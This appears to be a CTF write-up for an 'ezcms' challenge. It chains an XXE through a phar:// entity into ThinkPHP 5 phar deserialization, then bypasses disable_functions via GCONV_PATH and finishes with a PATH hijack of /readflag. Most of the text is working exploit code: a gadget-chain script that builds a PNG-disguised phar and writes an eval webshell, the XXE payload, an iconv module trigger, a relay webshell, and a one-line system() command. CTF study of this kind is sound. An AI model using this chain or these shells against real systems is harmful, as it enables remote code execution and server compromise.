ezcms
info.php exposes phpinfo() (useful later for the libxml version and the disable_functions list). Read the application source code.
The XML parsing code does not disable entity loading, so an XXE looked possible. Debugging locally gave no result at first: newer libxml2 builds (2.9.0 and later) stop resolving external entities by default, so the local PHP never fetched the entity.
Checked the target's libxml version on info.php: it is exactly 2.8.0, which still resolves external entities by default.
Out-of-band exfiltration of the flag through the entity got no response. Next idea: put a phar:// URL in the entity's SYSTEM identifier so that resolving the entity opens the archive and deserializes its metadata (phar deserialization). That needs a file-upload point to get the phar onto the box.
Register a user, then upload the phar as an avatar. The ThinkPHP 5 phar was built and debugged locally; it must begin with a valid image header because the upload handler calls getimagesize() (typo "getimageszie" in the original) and checks the reported width/height.
<?php
namespace think\process\pipes;
use think\model\Pivot;
/**
 * Stand-in for think\process\pipes\Pipes, the abstract parent of the
 * framework's Windows pipes class. It carries no state; it exists only so the
 * class hierarchy in the serialized metadata matches the target's.
 */
class Pipes
{
    // intentionally empty
}
/**
 * Entry gadget of the chain. Per the original note, seeding $files with a
 * Model subclass is what makes the framework's Windows object trigger
 * Model::__toString() on destruction (the exact path through the framework
 * is not shown here; Pivot is simply the concrete Model subclass chosen).
 *
 * $files is private, so it is serialized under the mangled name
 * "\0think\process\pipes\Windows\0files" -- keep the class name and
 * visibility as they are.
 */
class Windows extends Pipes
{
    private $files = [];

    public function __construct()
    {
        // Append rather than reassign; the result is the same one-element list.
        $this->files[] = new Pivot();
    }
}
namespace think\model;
#Relation
use think\db\Query;
/**
 * Stand-in for think\model\Relation. Only the two properties the chain reads
 * are declared: $selfRelation (kept false) and $query (a Query instance).
 * Initializing $selfRelation at declaration time yields exactly the same
 * object state as assigning it in the constructor.
 */
abstract class Relation
{
    protected $selfRelation = false;
    protected $query;

    public function __construct()
    {
        $this->query = new Query();
    }
}
namespace think\model\relation;
#OneToOne HasOne
use think\model\Relation;
/**
 * Stand-in for think\model\relation\OneToOne: an intermediate abstract class
 * between HasOne and Relation. It adds nothing of its own and just forwards
 * construction to Relation so the hierarchy mirrors the framework.
 */
abstract class OneToOne extends Relation
{
    public function __construct()
    {
        parent::__construct();
    }
}
/**
 * Stand-in for think\model\relation\HasOne, the Relation subclass the original
 * picked because it exposes getBindAttr(). $bindAttr holds the two-element
 * list the chain expects; a declaration-time default gives the same
 * serialized state as the original constructor assignment.
 */
class HasOne extends OneToOne
{
    protected $bindAttr = ['no', '123'];

    public function __construct()
    {
        parent::__construct();
    }
}
namespace think\console;
#Output
use think\session\driver\Memcached;
/**
 * Stand-in for think\console\Output. The original note says it is placed where
 * a method call lands so that Output::__call() runs; $handle is the Memcached
 * session driver whose write() is the next hop, and $styles lists the one
 * method name ('getAttr') the chain needs to be considered a valid style.
 *
 * $handle is private: its serialized key is "\0think\console\Output\0handle".
 */
class Output
{
    private $handle = null;
    protected $styles = ['getAttr'];

    public function __construct()
    {
        $this->handle = new Memcached();
    }
}
namespace think;
#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
/**
 * Stand-in for think\Model, whose __toString() the chain enters from the
 * Windows gadget. Property roles, as recorded in the original comments:
 *  - $parent:       an Output instance, so method calls on it end in Output::__call()
 *  - $append:       ['getError'] (uncommented in the original; presumably the
 *                   name the model resolves to its own getError() when appending)
 *  - $error:        a HasOne relation (Relation subclass that has getBindAttr())
 *  - $selfRelation: false, so isSelfRelation() is false
 *  - $query:        a Query whose model is again an Output
 *  - $aaaaa:        never set; kept only so the serialized shape matches the original
 *
 * NOTE(review): the original marks $parent as "the modified spot" -- it is
 * public here. Property visibility changes the serialized key, which decides
 * whether unserialize() lands on the framework's declared property; confirm it
 * matches the target framework version before reuse.
 */
abstract class Model
{
    protected $append = ['getError'];
    protected $error;
    public $parent;
    protected $selfRelation = false;
    protected $query;
    protected $aaaaa;

    public function __construct()
    {
        $this->parent = new Output();
        $this->error  = new HasOne();
        $this->query  = new Query();
    }
}
namespace think\db;
#Query
use think\console\Output;
/**
 * Stand-in for think\db\Query. The only property the chain relies on is
 * $model, which is deliberately an Output so that any model method call made
 * through the query hits Output::__call().
 */
class Query
{
    protected $model;

    public function __construct()
    {
        $this->model = new Output();
    }
}
namespace think\session\driver;
#Memcached
use think\cache\driver\File;
/**
 * Stand-in for think\session\driver\Memcached. Its $handler is the File cache
 * driver: per the original note, the goal is to reach File->set(), which is
 * what eventually writes the webshell to disk.
 */
class Memcached
{
    protected $handler = null;

    public function __construct()
    {
        $this->handler = new File();
    }
}
namespace think\cache\driver;
#File
/**
 * Stand-in for think\cache\driver\File, the final sink of the chain. The
 * options mimic the driver's config; 'path' is not a directory but a
 * php://filter write chain (utf-8 -> utf-7 iconv, then base64-decode) whose
 * resource name carries the base64 of "<?php eval($_POST[1]);?>". The filter
 * pair is presumably there to discard whatever header the driver prepends so
 * that only the decoded webshell survives in the written file.
 */
class File
{
    protected $options = [];
    protected $tag = true;

    public function __construct()
    {
        $filterPath = 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=./AAPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+';
        $this->options = [
            'expire'        => 0,
            'cache_subdir'  => false,
            'prefix'        => '',
            'path'          => $filterPath,
            'data_compress' => false,
        ];
    }
}
namespace think\model;
use think\Model;
/**
 * Concrete Model subclass used as the __toString() carrier inside
 * Windows::$files. Nothing is added; Model is abstract and needs a concrete
 * child to be instantiated.
 */
class Pivot extends Model
{
    // intentionally empty
}
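use think\process\pipes\Windows;

// Phar::setStub()/setMetadata() need phar.readonly off; the default CLI
// setting is on, so fail early with a usable hint instead of a fatal error.
if (ini_get('phar.readonly')) {
    fwrite(STDERR, "phar.readonly is enabled; run as: php -d phar.readonly=0 " . basename(__FILE__) . "\n");
    exit(1);
}

$pharFile = 'phar.phar';
$pngFile  = 'phar.png';

// Start from a clean archive so stale entries/metadata from an earlier run
// are not carried over.
if (file_exists($pharFile)) {
    unlink($pharFile);
}

$phar = new \Phar($pharFile);
$phar->startBuffering();

// The stub is an 11x7 PNG (signature, IHDR, IDAT, IEND chunks) so that
// getimagesize() on the upload reports a width/height, followed by the
// __HALT_COMPILER() marker every phar stub must end with.
$pngBytes = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x0B\x00\x00\x00\x07\x08\x02\x00\x00\x00\x51\x0C\x20\x0A\x00\x00\x00\x56\x49\x44\x41\x54\x08\x1D\x7D\x8E\x51\x0E\x80\x30\x08\x43\x2D\x7A\x58\x13\x3F\xBD\x3F\xF8\x5C\x89\x66\x31\xB1\x1F\x85\x42\x57\xA6\xFD\x3C\x96\x81\xAA\xA2\xC2\x20\x22\xA4\xD5\xF3\xCD\x45\x52\x66\xC2\x48\x18\x20\x27\x07\xEF\xAC\xED\x40\x61\x9A\x1C\x08\x92\xBD\xF6\x82\x2C\x37\xF7\xF4\x1F\xFD\x0F\x4C\x4F\x2C\xFD\x38\xDA\x77\x5F\xC7\x27\xA9\x1D\x17\x2B\x4E\x1A\x69\x39\x58\x2D\x5C\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82";
$phar->setStub($pngBytes . "<?php __HALT_COMPILER(); ?>");

// The metadata is what gets unserialized when the archive is opened through
// phar://; the Windows object is the head of the gadget chain.
$phar->setMetadata(new Windows());

// A phar needs at least one entry to be valid.
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

// Rename natively instead of shelling out to mv: no shell, and the failure is
// reported rather than silently ignored.
if (!rename($pharFile, $pngFile)) {
    fwrite(STDERR, "failed to rename {$pharFile} to {$pngFile}\n");
    exit(1);
}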
Trigger the XXE from the home page; resolving the phar:// entity opens the uploaded archive and deserializes its metadata (the phar deserialization step):
<?xml version="1.0" encoding="utf-8"?>
<!-- XXE payload. The entity's SYSTEM identifier uses PHP's phar:// stream
     wrapper, so resolving it opens the uploaded "PNG" as a phar archive and
     (as the writeup relies on) unserializes its metadata, firing the gadget
     chain. Nothing needs to come back in the response; the side effect
     happens at resolution time. The path is environment specific: it must be
     the absolute on-disk location where the avatar upload landed. -->
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929134023c0.png"> ]>
<creds>&goodies;</creds>
disable_functions is set, but putenv() is not in the list, so the GCONV_PATH + iconv bypass applies (a malicious gconv module is loaded when iconv converts to a custom charset). The AntSword (蚁剑, mis-typed as 蚁键 in the original) bypass plugin was used for this; it starts a local web service that runs without the restriction.
Trigger iconv (this is what loads the module):
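<?php
// GCONV_PATH bypass: glibc's iconv looks up charset modules through
// $GCONV_PATH/gconv-modules, so pointing it at /tmp makes the conversion
// below load an attacker-supplied shared object for the "payload" charset.
// putenv() must not be in disable_functions for this to work.
$gconvDir = '/tmp/';

// Fail early rather than trigger against a half-written setup: the original
// attempt with a wrong payload stopped working afterwards until the box was
// reset (presumably the failed module lookup is cached by the process), so
// make sure the module table is in place before touching iconv.
// NOTE(review): the .so file name comes from gconv-modules and is not shown
// here -- check it exists as well.
if (!is_file($gconvDir . 'gconv-modules')) {
    die('missing ' . $gconvDir . "gconv-modules - upload it and the payload .so first\n");
}

putenv('GCONV_PATH=' . $gconvDir);
// Writing through the convert.iconv filter with a custom target charset is
// the call that makes glibc resolve and dlopen() the module.
file_put_contents('php://filter/write=convert.iconv.payload.utf-8/resource=/tmp/guoke', 123);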
The first attempt used a wrong payload, and after that it would not trigger again until the environment was reset (the worker process most likely keeps the result of the failed module lookup, so a corrected module is never reloaded).
POST through to the inner webshell, the one served without disable_functions:
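<?php
// Relay shell. This file runs under the web server worker that still has
// disable_functions applied; it forwards the PHP code from POST parameter "1"
// to the webshell served by the helper HTTP service on 127.0.0.1:62353
// (presumably the AntSword-started service without disable_functions) and
// echoes whatever that shell returns.
if (!isset($_POST[1])) {
    http_response_code(400);
    exit("missing POST parameter 1\n");
}

$info = ['1' => $_POST[1]];
$url = 'http://127.0.0.1:62353/AAPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+3b58a9545013e88c7186db11bb158c44.php';

$context = stream_context_create([
    'http' => [
        'method'  => 'POST',
        'header'  => 'Content-type:application/x-www-form-urlencoded',
        'content' => http_build_query($info),
        'timeout' => 20,
        // Return the body on non-2xx responses too, so errors raised by the
        // inner shell are visible instead of being swallowed as a warning.
        'ignore_errors' => true,
    ],
]);

$result = file_get_contents($url, false, $context);
if ($result === false) {
    // Connection-level failure: the helper service is down or the port changed.
    exit("request to the inner shell failed (is the helper service still up?)\n");
}
echo $result;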
/readflag invokes cat by its bare name, so hijack it through PATH: drop a fake executable named cat in /tmp, prepend /tmp to PATH, and run /readflag (environment-variable privilege escalation). This only works because /readflag resolves cat via a PATH lookup rather than an absolute path; `chmod +x` would be enough, 777 is just lazy.
1=system('env;export PATH=/tmp:$PATH;echo "/bin/cat /flag" > /tmp/cat;chmod 777 /tmp/cat;/readflag');